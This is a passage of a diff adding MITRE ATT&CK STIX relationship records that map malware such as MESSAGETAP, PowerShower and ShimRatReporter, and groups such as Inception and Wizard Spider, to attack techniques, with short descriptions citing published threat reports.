+ "description": "Leong, R., Perez, D., Dean, T. (2019, October 31). MESSAGETAP: Who\u2019s Reading Your Text Messages?. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[MESSAGETAP](https://attack.mitre.org/software/S0443) checks two files, keyword_parm.txt and parm.txt, for instructions on how to target and save data parsed and extracted from SMS message data from the network traffic. If an SMS message contained either a phone number, IMSI number, or keyword that matched the predefined list, it is saved to a CSV file for later theft by the threat actor.(Citation: FireEye MESSAGETAP October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--f60b8223-eea6-422e-99c6-7f9b70e8ea53",
+ "type": "relationship",
+ "modified": "2020-06-24T01:43:11.357Z",
+ "created": "2020-05-11T22:12:28.689Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--9b19d6b4-cfcb-492f-8ca8-8449e7331573",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "FireEye MESSAGETAP October 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html",
+ "description": "Leong, R., Perez, D., Dean, T. (2019, October 31). MESSAGETAP: Who\u2019s Reading Your Text Messages?. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "After checking for the existence of two files, keyword_parm.txt and parm.txt, [MESSAGETAP](https://attack.mitre.org/software/S0443) XOR decodes and read the contents of the files. (Citation: FireEye MESSAGETAP October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--97323d60-9623-4b3e-8ff9-50370fef4e5b",
+ "type": "relationship",
+ "modified": "2020-06-24T01:43:11.356Z",
+ "created": "2020-05-11T22:12:28.717Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--9b19d6b4-cfcb-492f-8ca8-8449e7331573",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "FireEye MESSAGETAP October 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html",
+ "description": "Leong, R., Perez, D., Dean, T. (2019, October 31). MESSAGETAP: Who\u2019s Reading Your Text Messages?. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[MESSAGETAP](https://attack.mitre.org/software/S0443) checks for the existence of two configuration files (keyword_parm.txt and parm.txt) and attempts to read the files every 30 seconds.(Citation: FireEye MESSAGETAP October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--f9c13c35-a493-4733-b51c-ab4857692e18",
+ "type": "relationship",
+ "modified": "2020-06-24T01:43:11.336Z",
+ "created": "2020-05-11T22:12:28.735Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8caa18af-4758-4fd3-9600-e8af579e89ed",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[VBShower](https://attack.mitre.org/software/S0442) has the ability to execute VBScript files.(Citation: Kaspersky Cloud Atlas August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--338371ce-f2c3-4401-9e9a-c4c5667f87cb",
+ "type": "relationship",
+ "modified": "2020-05-12T12:46:57.138Z",
+ "created": "2020-05-12T12:46:57.138Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) has used malicious HTA files to drop and execute malware.(Citation: Kaspersky Cloud Atlas August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--864fdbd1-99fe-4036-a296-241c53337d85",
+ "type": "relationship",
+ "modified": "2020-05-12T12:49:52.904Z",
+ "created": "2020-05-12T12:49:52.904Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7",
+ "target_ref": "malware--9b19d6b4-cfcb-492f-8ca8-8449e7331573",
+ "external_references": [
+ {
+ "source_name": "FireEye MESSAGETAP October 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html",
+ "description": "Leong, R., Perez, D., Dean, T. (2019, October 31). MESSAGETAP: Who\u2019s Reading Your Text Messages?. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "(Citation: FireEye MESSAGETAP October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--95a4d32c-7705-4527-abd8-9d2aca70dbc0",
+ "type": "relationship",
+ "modified": "2020-06-24T01:43:11.354Z",
+ "created": "2020-05-12T14:07:23.123Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--53486bc7-7748-4716-8190-e4f1fde04c53",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[PowerShower](https://attack.mitre.org/software/S0441) has the ability to remove all files created during the dropper process.(Citation: Unit 42 Inception November 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--38938464-b328-4d89-a3a3-7e1f68cb195e",
+ "type": "relationship",
+ "modified": "2020-05-12T15:18:44.234Z",
+ "created": "2020-05-12T14:12:19.673Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--53486bc7-7748-4716-8190-e4f1fde04c53",
+ "target_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0",
+ "external_references": [
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[PowerShower](https://attack.mitre.org/software/S0441) has added a registry key so future powershell.exe instances are spawned with coordinates for a window position off-screen by default.(Citation: Unit 42 Inception November 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--dca41ced-2af1-4cec-8ed2-a1c77bc535ed",
+ "type": "relationship",
+ "modified": "2020-05-12T15:18:44.236Z",
+ "created": "2020-05-12T14:12:19.680Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--53486bc7-7748-4716-8190-e4f1fde04c53",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[PowerShower](https://attack.mitre.org/software/S0441) has used a PowerShell document stealer module to pack and exfiltrate .txt, .pdf, .xls or .doc files smaller than 5MB that were modified during the past two days.(Citation: Kaspersky Cloud Atlas August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--8b02b838-22f8-469b-97f1-7185b06d286a",
+ "type": "relationship",
+ "modified": "2020-05-12T14:12:19.697Z",
+ "created": "2020-05-12T14:12:19.697Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--53486bc7-7748-4716-8190-e4f1fde04c53",
+ "target_ref": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[PowerShower](https://attack.mitre.org/software/S0441) has used 7Zip to compress .txt, .pdf, .xls or .doc files prior to exfiltration.(Citation: Kaspersky Cloud Atlas August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--dd82b9d7-d60c-4dc0-97d7-244a1365a1e9",
+ "type": "relationship",
+ "modified": "2020-05-12T20:33:57.737Z",
+ "created": "2020-05-12T14:12:19.716Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--53486bc7-7748-4716-8190-e4f1fde04c53",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[PowerShower](https://attack.mitre.org/software/S0441) has the ability to deploy a reconnaissance module to retrieve a list of the active processes.(Citation: Kaspersky Cloud Atlas August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--45098d46-2345-4fe4-8b07-2345ffbb9e60",
+ "type": "relationship",
+ "modified": "2020-05-12T14:26:05.003Z",
+ "created": "2020-05-12T14:26:05.003Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--53486bc7-7748-4716-8190-e4f1fde04c53",
+ "target_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c",
+ "external_references": [
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ },
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[PowerShower](https://attack.mitre.org/software/S0441) has the ability to encode C2 communications with base64 encoding.(Citation: Unit 42 Inception November 2018)(Citation: Kaspersky Cloud Atlas August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--98b19c5d-efbc-4e00-b7cc-71df5a1109e0",
+ "type": "relationship",
+ "modified": "2020-05-20T20:43:50.223Z",
+ "created": "2020-05-12T14:26:05.035Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "tool--ff6caf67-ea1f-4895-b80e-4bb0fc31c6db",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--fc19dd7e-415d-4e27-92bd-262392b6d38f",
+ "type": "relationship",
+ "modified": "2020-05-12T18:25:44.512Z",
+ "created": "2020-05-12T18:25:44.512Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "malware--00806466-754d-44ea-ad6f-0caf59cb8556",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--02e03773-7cea-4b40-bf96-f22ccbc7187f",
+ "type": "relationship",
+ "modified": "2020-05-12T18:25:44.515Z",
+ "created": "2020-05-12T18:25:44.515Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "tool--3433a9e8-1c47-4320-b9bf-ed449061d1c3",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--d73c0fd6-cbd9-4eaa-abca-a1626364ab1b",
+ "type": "relationship",
+ "modified": "2020-05-12T18:25:44.530Z",
+ "created": "2020-05-12T18:25:44.530Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "malware--32066e94-3112-48ca-b9eb-ba2b59d2f023",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--8263754e-20a6-49ac-9ffb-3f0e9113b228",
+ "type": "relationship",
+ "modified": "2020-05-12T18:25:44.532Z",
+ "created": "2020-05-12T18:25:44.532Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used spearphishing attachments to deliver Microsoft documents containing macros to download either [Emotet](https://attack.mitre.org/software/S0367), Bokbot, or [TrickBot](https://attack.mitre.org/software/S0266).(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--c671056c-f213-4084-9e9e-3361274ceb80",
+ "type": "relationship",
+ "modified": "2020-05-15T18:52:17.500Z",
+ "created": "2020-05-12T18:42:01.854Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) encrypted gathered information with a combination of shifting and XOR using a static key.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--ed1cb231-7e2d-461c-a9c8-56a2d1f43c0f",
+ "type": "relationship",
+ "modified": "2020-05-15T18:47:04.312Z",
+ "created": "2020-05-12T21:44:40.839Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "target_ref": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) listed all non-privileged and privileged accounts available on the machine.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--52741f41-28c6-4533-bd26-6dc21f6b0794",
+ "type": "relationship",
+ "modified": "2020-05-15T18:47:04.358Z",
+ "created": "2020-05-12T21:44:40.843Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) listed all running processes on the machine.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--f6ac9b3a-9a1f-40be-b541-bcdb8aac6845",
+ "type": "relationship",
+ "modified": "2020-05-15T18:47:04.357Z",
+ "created": "2020-05-12T21:44:40.855Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) gathered the operating system name and specific Windows version of an infected machine.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--c62b3e99-4ab2-4474-b3f7-2779652210f7",
+ "type": "relationship",
+ "modified": "2020-05-15T18:47:04.395Z",
+ "created": "2020-05-12T21:44:40.900Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) communicated over HTTP with preconfigured C2 servers.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--e29d49a0-7cbf-47a2-b01a-d27056627c81",
+ "type": "relationship",
+ "modified": "2020-05-12T21:44:40.902Z",
+ "created": "2020-05-12T21:44:40.902Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) had the ability to download additional payloads.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--137f13ee-0607-47ba-952b-dbe39c1330bb",
+ "type": "relationship",
+ "modified": "2020-05-12T21:44:40.904Z",
+ "created": "2020-05-12T21:44:40.904Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) spoofed itself as AlphaZawgyl_font.exe, a specialized Unicode font.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--772a4f4f-459d-411f-a8e9-2c453274f684",
+ "type": "relationship",
+ "modified": "2020-05-27T22:39:28.858Z",
+ "created": "2020-05-12T21:44:40.918Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "target_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) sent collected system and network information compiled into a report to an adversary-controlled C2.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--d894e46e-1967-4499-83d5-626a8e49a97a",
+ "type": "relationship",
+ "modified": "2020-05-15T18:47:04.423Z",
+ "created": "2020-05-12T21:44:41.002Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "target_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) gathered information automatically, without instruction from a C2, related to the user and host machine that is compiled into a report and sent to the operators.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--f47a9039-b5c0-49e5-9998-2820b075643f",
+ "type": "relationship",
+ "modified": "2020-05-15T18:47:04.386Z",
+ "created": "2020-05-12T21:44:41.005Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "target_ref": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) gathered the local privileges for the infected host.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--c403720d-da66-45c4-bb35-93b3b35c87c3",
+ "type": "relationship",
+ "modified": "2020-05-15T18:47:04.393Z",
+ "created": "2020-05-12T21:44:41.012Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) gathered the local proxy, domain, IP, routing tables, mac address, gateway, DNS servers, and DHCP status information from an infected host.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--c3e022e8-5759-4d38-8536-adaf9e952717",
+ "type": "relationship",
+ "modified": "2020-05-15T18:47:04.430Z",
+ "created": "2020-05-12T21:44:41.016Z"
+ },
+ {
